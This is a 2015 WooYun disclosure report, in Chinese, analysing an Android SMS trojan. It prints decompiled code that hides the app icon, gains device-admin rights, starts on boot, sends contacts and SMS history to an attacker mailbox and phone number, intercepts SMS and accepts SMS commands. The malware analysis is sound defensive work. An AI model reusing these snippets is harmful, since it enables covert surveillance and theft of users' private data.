当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107785

漏洞标题:黑产兼容android 4.4的蠕虫短信马出现(附受害者信息)

相关厂商:cncert

漏洞作者: 路人甲

提交时间:2015-04-14 11:53

修复时间:2015-07-16 09:56

公开时间:2015-07-16 09:56

漏洞类型:地下0day/成功的入侵事件

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-14: 细节已通知厂商并且等待厂商处理中
2015-04-17: 厂商已经确认,细节仅向厂商公开
2015-04-20: 细节向第三方安全合作伙伴开放
2015-06-11: 细节向核心白帽子及相关领域专家公开
2015-06-21: 细节向普通白帽子公开
2015-07-01: 细节向实习白帽子公开
2015-07-16: 细节向公众公开

简要描述:

高版本的Android不一定安全哦,还是要注意使用习惯.木马通过邮件发送通信录和历史短信,实时截获短信,并且可以通过短信指令控制手机.为啥这些个安全团队/厂商的壳都给木马在用了.

详细说明:

木马用了阿里的壳,脱壳比较蛋疼
因为android 4.4 只有默认短信app才能收发短信,木马在服务中加入了兼容代码

service.png


smsdoor3.png


注意不要点这个哦.

smsdoor4.png


硬编码的发件邮箱

mail.png


入口1:主界面aa.bb.cc.dd.ClientActivity,进行如下操作:

* 隐藏图标
#!java
getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
* 激活设备管理
#!java
Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.componentName);
localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "");
startActivityForResult(localIntent, 20);
* 启动MyService
#!java
startService(new Intent(this, MyService.class));
* 通过短信发送受害者设备id给18458174771
#!java
Assets.sendMsg("18458174771", Assets.getInstallFlag(this, ""));
* 启动MailTask,后台通过邮件发送受害者手机号+设备id(邮件标题)和通信录(邮件内容)给[email protected]
#!java
new MailTask("", this).execute(new Integer[0])

* 启动SmsTask,后台通过邮件发送受害者手机号+设备id(邮件标题)和短信历史(邮件内容)给[email protected]
#!java
new SmsTask("", this).execute(new Integer[0]);

防卸载:设备管理器

<receiver android:name="com.iwawad.vaaweea00.Dx" android:permission="android.permission.BIND_DEVICE_ADMIN">
			
			<meta-data android:name="android.app.device_admin" android:resource="@7F040000">
			</meta-data>
			
			<intent-filter>
				
				<action android:name="android.app.action.DEVICE_ADMIN_ENABLED">
				</action>
				
			</intent-filter>
			
		</receiver>


入口2:开机启动广播接收器aa.bb.cc.dd.BootReceiver

<receiver android:name="aa.bb.cc.dd.BootReceiver">
			
			<intent-filter android:priority="2147483647">
				
				<action android:name="android.intent.action.BOOT_COMPLETED">
			</action>
				
			</intent-filter>



进行如下操作:

* 启动服务com.iwawad.vaaweea00.MyService

#!java
		paramContext.startService(new Intent(paramContext, MyService.class));



* 发送监控安装短信给18458174771

#!java
		SmsManager.getDefault().sendTextMessage("18458174771", null, paramContext.getString(2131165186), null, null); //String为监控安装



后台服务:com.iwawad.vaaweea00.MyService

service.png


* 对系统版本进行判断,android 4.4启动WebInterfaceActivity,用于设置成默认短信管理软件来得到

#!java
		if ((String.valueOf(Build.VERSION.RELEASE).indexOf("4.4") != -1) && (!Telephony.Sms.getDefaultSmsPackage(MyService.this).equals(str)))
        {
          Intent localIntent = new Intent(MyService.this, WebInterfaceActivity.class);
          localIntent.addFlags(268435456);
          MyService.this.startActivity(localIntent);
        }


default sms app特性已经被木马使用,之前还以为此机制加入会对短信马会有极大遏制,但是现在想想既然傻傻的安装了木马,再傻傻的设置为默认好像很正常.一种木马诞生后往往不会消亡,它会不断的演变进化,此木马就通过简单的代码顺利兼容了android4.4.
入口3:短信广播接收器com.iwawad.vaaweea00.XReceiver
<receiver android:name="com.iwawad.vaaweea00.XReceiver" android:permission="android.permission.BROADCAST_SMS">

<intent-filter android:priority="2147483647"> //设置优先级

<action android:name="android.provider.Telephony.SMS_RECEIVED">//接收短信
</action>

<category android:name="android.intent.category.DEFAULT">
</category>

</intent-filter>

<intent-filter>

<action android:name="android.provider.Telephony.SMS_DELIVER"> //4.4特性,default SMS app
</action>

</intent-filter>

</receiver>

![](recevier.png)
* 短信广播接收器设置最高接收优先级拦截短信,abortBroadcast();忽略短信广播.
* 启动拨号界面```tel:**21*121# **21*# ##21#``` //貌似是测试设备有没有卡
* 拦截记录收(MailTask/SmsTask)发(SendTask)短信邮件通知[email protected]
* 短信指令控制手机:监控状态 SetupMessagesyncTask/发送指定短信 SendMessageasyncTask

send.png


setup.png


漏洞证明:

一些受害者的信息

mailcollect.jpg


mailcollect2.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-04-17 09:54

厂商回复:

CNVD确认为移动互联网恶意代码事件,已经转报给CNCERT,按照工业和信息化部《移动互联网恶意程序监测与处置机制》流程处置。

最新状态:

暂无